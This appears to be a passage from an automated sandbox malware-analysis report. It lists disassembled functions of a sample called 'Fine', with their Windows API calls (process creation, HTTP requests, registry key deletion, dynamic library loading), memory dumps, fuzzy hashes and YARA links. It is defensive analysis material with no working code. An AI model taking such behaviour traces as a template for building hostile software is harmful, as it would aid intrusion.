                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 37B1F4316287129FC718EF28C890A6BB7E5BFA4724F50491EF4DA87292D770D854CB92
                                                                                                                                                                                                                                                                                                                            Function 0025BA59 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BBF8
                                                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC10
                                                                                                                                                                                                                                                                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC34
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BC60
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC74
                                                                                                                                                                                                                                                                                                                            • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0025BC96
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BD92
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00240F4E: GetStdHandle.KERNEL32(000000F6), ref: 00240F6D
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BDAB
                                                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0025BDC6
                                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0025BE16
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00000000), ref: 0025BE67
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0025BE99
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025BEAA
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025BEBC
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0025BECE
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0025BF43
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 5ba2936969c04451d0b015e3bf0cb27ee6ad7ce18bcc9bea3c8bbec4417470f6
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 10560c4ac0be199a06cd64fadc87f680c7c9e8f6d7e9f2a52c3c5d5254fe7978
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ba2936969c04451d0b015e3bf0cb27ee6ad7ce18bcc9bea3c8bbec4417470f6
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82F1CE716143019FC715EF24C891B6ABBE1BF94315F18895EF8858B2A2CB70EC58CF56
                                                                                                                                                                                                                                                                                                                            Function 00254A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0026DCD0), ref: 00254B18
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00254B2A
                                                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0026DCD0), ref: 00254B4F
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,0026DCD0), ref: 00254B9B
                                                                                                                                                                                                                                                                                                                            • StringFromGUID2.OLE32(?,?,00000028,?,0026DCD0), ref: 00254C05
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(00000009), ref: 00254CBF
                                                                                                                                                                                                                                                                                                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00254D25
                                                                                                                                                                                                                                                                                                                            • SysFreeString.OLEAUT32(?), ref: 00254D4F
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 354098117-199464113
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 1b7f00795bf1bc559314b97e416c153befbdad7b4503f78d6360ae84f22a24a8
                                                                                                                                                                                                                                                                                                                            • Instruction ID: eccf1466c66c184292fc42c3517170b5d6702f3103175d30b7b0d9712aa34325
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1b7f00795bf1bc559314b97e416c153befbdad7b4503f78d6360ae84f22a24a8
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB127E71A10109EFCB14DF54C888EAEB7B5FF85319F248098F8099B251D771ED9ACBA4
                                                                                                                                                                                                                                                                                                                            Function 001D381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(002A29C0), ref: 00213F72
                                                                                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(002A29C0), ref: 00214022
                                                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00214066
                                                                                                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0021406F
                                                                                                                                                                                                                                                                                                                            • TrackPopupMenuEx.USER32(002A29C0,00000000,?,00000000,00000000,00000000), ref: 00214082
                                                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0021408E
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                                                            • API String ID: 36266755-4108050209
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b8f9e20586d45b446b6c8c55bcb5b93979480fc55d69749d7fb6a9022e8635c9
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 274229360a16108e0dfe3ef8c00494f3d213dba48d4dc62798fbea4cd04f7ba6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8f9e20586d45b446b6c8c55bcb5b93979480fc55d69749d7fb6a9022e8635c9
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82713870A14206BFEB25DF29DC49FEABFA9FF05324F104216F524662D0C7B19960DB91
                                                                                                                                                                                                                                                                                                                            Function 00267711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,?), ref: 00267823
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00267897
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 002678B9
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002678CC
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 002678ED
                                                                                                                                                                                                                                                                                                                            • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,001D0000,00000000), ref: 0026791C
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00267935
                                                                                                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0026794E
                                                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(00000000), ref: 00267955
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0026796D
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00267985
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D2234: GetWindowLongW.USER32(?,000000EB), ref: 001D2242
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                                            • API String ID: 2429346358-3619404913
                                                                                                                                                                                                                                                                                                                            • Opcode ID: af793611a3241d3252eb108dc9c7185bed504e0dfe7318cb558a735521528f68
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 9b5fb9b5a4fb2e59e521199b8dae4cb1111ef0d2f6200ba2bed706232184916c
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: af793611a3241d3252eb108dc9c7185bed504e0dfe7318cb558a735521528f68
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E071CD70504206AFD721CF18EC48F6ABBF9FB8A304F144A5EF88587261CBB0E855DB11
                                                                                                                                                                                                                                                                                                                            Function 001D146D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,001D1488,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 001D1865
                                                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 001D1521
                                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(00000000,?,?,?,?,001D145A,00000000,?), ref: 001D15BB
                                                                                                                                                                                                                                                                                                                            • DestroyAcceleratorTable.USER32(00000000), ref: 002129B4
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 002129E2
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,001D145A,00000000,?), ref: 002129F9
                                                                                                                                                                                                                                                                                                                            • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,001D145A,00000000), ref: 00212A15
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 00212A27
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                                            • String ID: <)*
                                                                                                                                                                                                                                                                                                                            • API String ID: 641708696-1305318363
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 73ffbd612bc48c08ac4944f0f9f4a68f8c773ad533aa4be9deba00677123916a
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 5cf1b657e61d563e3f5032238e7e5fb857e10b7953297097dca092c822dd3ec5
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 73ffbd612bc48c08ac4944f0f9f4a68f8c773ad533aa4be9deba00677123916a
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3618C31611716FFDB399F18E94CB6AB7F1FF92712F20811AE44346660C774A8A8DB41
                                                                                                                                                                                                                                                                                                                            Function 0024CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0024CEF5
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0024CF08
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0024CF1C
                                                                                                                                                                                                                                                                                                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0024CF35
                                                                                                                                                                                                                                                                                                                            • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0024CF78
                                                                                                                                                                                                                                                                                                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0024CF8E
                                                                                                                                                                                                                                                                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0024CF99
                                                                                                                                                                                                                                                                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0024CFC9
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0024D021
                                                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0024D035
                                                                                                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 0024D040
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                                            • Opcode ID: b91b131129bf8c60e7ff6017f97e89af3493cedf57006a80dc300a7c4ae3ca09
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 110d05f828e346643cd00ef1f8a17acd71a0c687eb9f0778e8e248b26654c454
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b91b131129bf8c60e7ff6017f97e89af3493cedf57006a80dc300a7c4ae3ca09
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C51BEB1610609BFDB268F61DC88ABBBBFCFF08744F10841AF94587200D774D919AB60
                                                                                                                                                                                                                                                                                                                            Function 00268FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,002666D6,?,?), ref: 00268FEE
                                                                                                                                                                                                                                                                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00268FFE
                                                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269009
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269016
                                                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00269024
                                                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269033
                                                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 0026903C
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269043
                                                                                                                                                                                                                                                                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,002666D6,?,?,00000000,?), ref: 00269054
                                                                                                                                                                                                                                                                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00270C04,?), ref: 0026906D
                                                                                                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 0026907D
                                                                                                                                                                                                                                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0026909D
                                                                                                                                                                                                                                                                                                                            • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 002690CD
                                                                                                                                                                                                                                                                                                                            • DeleteObject.GDI32(00000000), ref: 002690F5
                                                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0026910B
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 70485354783cc98207b4759abe2c2aa720b67162ef9dbe49ce9b6c8379aafa14
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 82b630266d04b42483a8978a612c0c9ec92cb5b55a059dfdcf1c64e43e563546
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 70485354783cc98207b4759abe2c2aa720b67162ef9dbe49ce9b6c8379aafa14
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8410775A00209FFDB119F65EC8CEAA7BBCEF89711F108059F909D7260DBB09991DB60
                                                                                                                                                                                                                                                                                                                            Function 0025C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001DB329: _wcslen.LIBCMT ref: 001DB333
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0025C10E,?,?), ref: 0025D415
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D451
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4C8
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0025D3F8: _wcslen.LIBCMT ref: 0025D4FE
                                                                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0025C154
                                                                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0025C1D2
                                                                                                                                                                                                                                                                                                                            • RegDeleteValueW.ADVAPI32(?,?), ref: 0025C26A
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0025C2DE
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0025C2FC
                                                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(advapi32.dll), ref: 0025C352
                                                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0025C364
                                                                                                                                                                                                                                                                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 0025C382
                                                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 0025C3E3
                                                                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 0025C3F4
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                                            • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c24c4473912eaf9560e18cb631f19982ed4e1565308f53772da0e884e2cd55dc
                                                                                                                                                                                                                                                                                                                            • Instruction ID: c414fa6af0eeace6c360db75bceedce1db14d3108b1f9435c93a01eaf592feed
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c24c4473912eaf9560e18cb631f19982ed4e1565308f53772da0e884e2cd55dc
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 57C17E30218302AFD710DF54C484F2ABBE1BF54319F24849DE85A8B3A2DB75ED5ACB95
                                                                                                                                                                                                                                                                                                                            Function 0026A94F Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 271windowCOMMON
